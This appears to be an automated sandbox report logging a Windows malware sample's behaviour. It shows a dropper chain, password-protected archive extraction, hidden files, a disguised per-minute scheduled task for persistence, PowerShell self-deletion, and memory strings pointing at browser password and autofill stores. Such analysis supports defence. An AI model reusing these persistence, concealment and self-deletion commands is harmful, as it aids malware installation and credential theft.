Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9176
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9176
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9176
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9176
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: LoaderClient.exe, 0000002F.00000002.269889838631.00007FFBB35E2000.00000002.00000001.01000000.00000042.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: LoaderClient.exe, 0000002F.00000002.269889838631.00007FFBB35E2000.00000002.00000001.01000000.00000042.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: b1dc05533c.exe, 00000014.00000003.269556756517.0000000003A33000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269556560799.0000000003BC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
Source: LoaderClient.exe, 0000002F.00000002.269889838631.00007FFBB35E2000.00000002.00000001.01000000.00000042.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: LoaderClient.exe, 0000002F.00000002.269889838631.00007FFBB35E2000.00000002.00000001.01000000.00000042.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: LoaderClient.exe, 0000002F.00000002.269889838631.00007FFBB35E2000.00000002.00000001.01000000.00000042.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: LoaderClient.exe, 0000002F.00000002.269889838631.00007FFBB35E2000.00000002.00000001.01000000.00000042.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: b1dc05533c.exe, 00000014.00000003.269558440471.00000000039F3000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269558119393.0000000003BC6000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269557715652.0000000003BC6000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269558011592.00000000039F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: LoaderClient.exe, 0000002F.00000002.269889838631.00007FFBB35E2000.00000002.00000001.01000000.00000042.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: b1dc05533c.exe, 00000014.00000003.269570364935.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269570020702.00000000039EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;

Source: file.exe

ReversingLabs: Detection: 47%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe "C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe"
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe "C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe "C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe"
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Process created: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe "C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\attrib.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Source: C:\Windows\System32\attrib.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe "C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe "C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe"
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe "C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe"
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: unknown	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe "C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe"
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Process created: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe "C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe "C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe"
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe "C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe "C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe "C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe "C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe "C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe "C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe "C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe "C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Process created: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe "C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe"
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Process created: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe "C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe"
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
